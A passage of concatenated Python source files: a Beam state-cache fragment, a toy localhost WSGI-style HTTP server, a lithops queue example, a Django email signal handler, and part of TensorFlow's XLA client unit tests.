# type: (Iterable[T], Callable[[], Iterable[T]]) -> None
self.head = head
self.continue_iterator_fn = continue_iterator_fn
def __iter__(self):
# type: () -> Iterator[T]
for item in self.head:
yield item
for item in self.continue_iterator_fn():
yield item
@staticmethod
def _convert_to_cache_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class _Future(Generic[T]):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
# type: () -> None
self._event = threading.Event()
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
return self._event.wait(timeout)
def get(self, timeout=None):
# type: (Optional[float]) -> T
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
# type: (T) -> None
self._value = value
self._event.set()
@classmethod
def done(cls):
# type: () -> _Future[None]
if not hasattr(cls, 'DONE'):
done_future = _Future[None]()
done_future.set(None)
cls.DONE = done_future # type: ignore[attr-defined]
return cls.DONE # type: ignore[attr-defined]
class KeyedDefaultDict(DefaultDict[_KT, _VT]):
if TYPE_CHECKING:
# we promise to only use a subset of what DefaultDict can do
def __init__(self, default_factory):
# type: (Callable[[_KT], _VT]) -> None
pass
def __missing__(self, key):
# type: (_KT) -> _VT
# typing: default_factory takes an arg, but the base class does not
self[key] = self.default_factory(key) # type: ignore # pylint: disable=E1137
return self[key]
|
server.py
|
'''
A HTTP server that is packaged using class(the same as "static_web_server.py")
This http server can retrieve html file in the './static' and run & print the result of xx.py in the './wsgipython'
1. create a socket
2. bind & reuse addr
3. listen
4. while True:
4.1 accept
4.2 new client comes=> create a new process to handle it
'''
import socket
import multiprocessing
import os
import sys
class HTTPServer(object):
'''
A class that creates a http server
'''
def __init__(self,application):
'''
static_dir: the path to the static files
'''
self.application=application
self.server_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
def run(self,listen_num):
'''
listen_num: the maximum number of listeners
'''
self.server_socket.listen(listen_num)
while True:
client_socket,client_addr=self.server_socket.accept()
print("%s:%s connected."%(str(client_addr[0]),str(client_addr[1])))
p = multiprocessing.Process(target=self.handle_client,args=[client_socket,client_addr])
p.start()
client_socket.close()
def bind(self,addr):
'''
addr: a tuple (ip,port)
'''
self.server_socket.bind(addr)
def start_response(self,status,headers):
'''
Construct our response header completely
:status:(eg. '200 OK')
:headers:(eg. [('Content-Type','text/html')])
:return:NoneType
:modify self.response_header:(eg. 'HTTP/1.1 200 OK\r\nxxx: xxx\r\n\')
'''
self.response_header='HTTP/1.1 '+status+'\r\n'
for header in headers:
self.response_header+="%s: %s\r\n"%(header[0],header[1]) # ": " has a space
self.response_header+="Author: orris\r\n"
def handle_client(self,client_socket,client_addr):
'''
A function that handles the client's request
1. recv
2. deal with the message
2.1 get the required path, such as "/","/ctime"
2.2 Construct "env" dict( add "PATH_INFO"...)
2.3 Call application member to deal with my response header and get the body
2.4 Construct response (splice the header and body)
3. send back
'''
recv_data=client_socket.recv(1024)
request_start_line=recv_data.decode('utf-8').split('\r\n')[0]
import re
print(request_start_line)
path=re.match('\w+\ (/[^\ ]*)\ ',request_start_line).group(1)
env={"PATH_INFO":path}
response_body=self.application(env,self.start_response)
response=self.response_header+'\r\n'+response_body
client_socket.send(response.encode('utf-8'))
client_socket.close()
def main():
'''
python server.py framework::app
:framework: A py file that implements the Web framework
:app: An object of Application that contains urls( we modify urls in the framework) and WSGI application
1. Get the framework module and the app object
2. Use the app to create a HTTP server
3. bind
4. run
'''
if len(sys.argv) != 2:
print('-'*30)
print('tips:')
print('python server.py framework:app')
print('-'*30)
exit()
else:
module_name,app_name=sys.argv[1].split(":")
module=__import__(module_name)
app=getattr(module,app_name)
http_server=HTTPServer(app)
http_server.bind(('127.0.0.1',2333))
http_server.run(100)
if __name__ == '__main__':
main()
|
simple_queue.py
|
from lithops.multiprocessing import Process, SimpleQueue, Queue
def f(q):
q.put([42, None, 'hello World'])
if __name__ == '__main__':
q = SimpleQueue()
# q = Queue()
p = Process(target=f, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'hello']"
p.join()
|
signals.py
|
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth import get_user_model
from sw.models import Message
from sw.task import send_verification_email
from threading import Thread
User = get_user_model()
@receiver(post_save, sender=Message, dispatch_uid='send_mail_to_user')
def send_mail_to_user(*args, **kwargs):
# print('I am working')
obj = kwargs.get("instance")
created = kwargs.get("created")
if created:
name = f"{obj.name}"
occupation = f"{obj.occupation}"
contact = f"{obj.phone}"
confidential = f"{obj.confidential}"
subject = f"{obj.subject}"
messages = f"{obj.messages}"
date = f"{obj.date}"
email = 'voluntaryreport@gmail.com'
background_job = Thread(target=send_verification_email, args=(name, occupation, contact, confidential, subject, messages, date, email))
print('Post is created')
background_job.start()
|
xla_client_test.py
|
# Lint as: python3
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
import portpicker
except ImportError:
portpicker = None
# pylint: enable=g-import-not-at-top
bfloat16 = xla_client.bfloat16
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
x = builder.Mul(p0, p1)
builder.Add(x, x)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
def testHloModuleToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.computation.get_hlo_module().to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testHloModuleToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = xla_client._xla.hlo_module_to_dot_graph(
computation.computation.get_hlo_module())
self.assertTrue(hlo_dot_graph.startswith("digraph "))
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = computation.Compile()
hlo_modules = executable.get_hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
class ComputationHashTest(absltest.TestCase):
def testHash(self):
builder0 = xla_client.ComputationBuilder("computation0")
p0 = builder0.ParameterFromNumpy(np.float32(0))
p1 = builder0.ParameterFromNumpy(np.zeros((4,), np.float32))
builder0.Mul(p0, p1)
computation0 = builder0.Build()
builder1 = xla_client.ComputationBuilder("computation1")
p0 = builder1.ParameterFromNumpy(np.float32(0))
p1 = builder1.ParameterFromNumpy(np.zeros((4,), np.float32))
builder1.Mul(p0, p1)
computation1 = builder1.Build()
self.assertEqual(computation0.Hash(), computation1.Hash())
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumBF16(self):
c = self._NewComputation()
c.Add(c.Constant(bfloat16(1.11)), c.Constant(bfloat16(3.14)))
self._ExecuteAndCompareClose(c, expected=bfloat16(4.25))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
device = xla_client.get_local_backend().devices()[0]
local_buffer = xla_client.Buffer.make_tuple((), device=device)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
device = xla_client.get_local_backend().devices()[0]
t = xla_client.Buffer.from_pyval(np.array([1, 2, 3, 4], dtype=np.int32))
local_buffer = xla_client.Buffer.make_tuple((t,), device)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
device = xla_client.get_local_backend().devices()[0]
t = (
xla_client.Buffer.from_pyval(
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32)),
xla_client.Buffer.from_pyval(np.array([2, 3, 4, 5], dtype=np.int32)),
)
local_buffer = xla_client.Buffer.make_tuple(t, device)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
device = xla_client.get_local_backend().devices()[0]
t = xla_client.Buffer.make_tuple(
(xla_client.Buffer.from_pyval(NumpyArrayF32([1.0, 2.0])),
xla_client.Buffer.from_pyval(NumpyArrayS32([3, 4]))), device)
local_buffer = xla_client.Buffer.make_tuple(
(t, xla_client.Buffer.from_pyval(NumpyArrayS32([5]))), device)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
device = xla_client.get_local_backend().local_devices()[0]
btup = xla_client.Buffer.make_tuple([b0, b1], device=device)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testTupleShape(self):
t = (
np.array([[1.0, 2.0, 3.0, 4.0]], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
device = xla_client.get_local_backend().local_devices()[0]
tuple_buffer = xla_client.Buffer.make_tuple([b0, b1], device=device)
tuple_shape = tuple_buffer.shape()
self.assertEqual(tuple_shape.leaf_count(), 2)
shapes = tuple_shape.tuple_shapes()
self.assertLen(shapes, 2)
shape1, shape2 = shapes
self.assertEqual(shape1.dimensions(), (1, 4))
self.assertEqual(shape2.dimensions(), (4,))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8)
for device in xla_client.get_local_backend().local_devices():
buf = xla_client.Buffer.from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
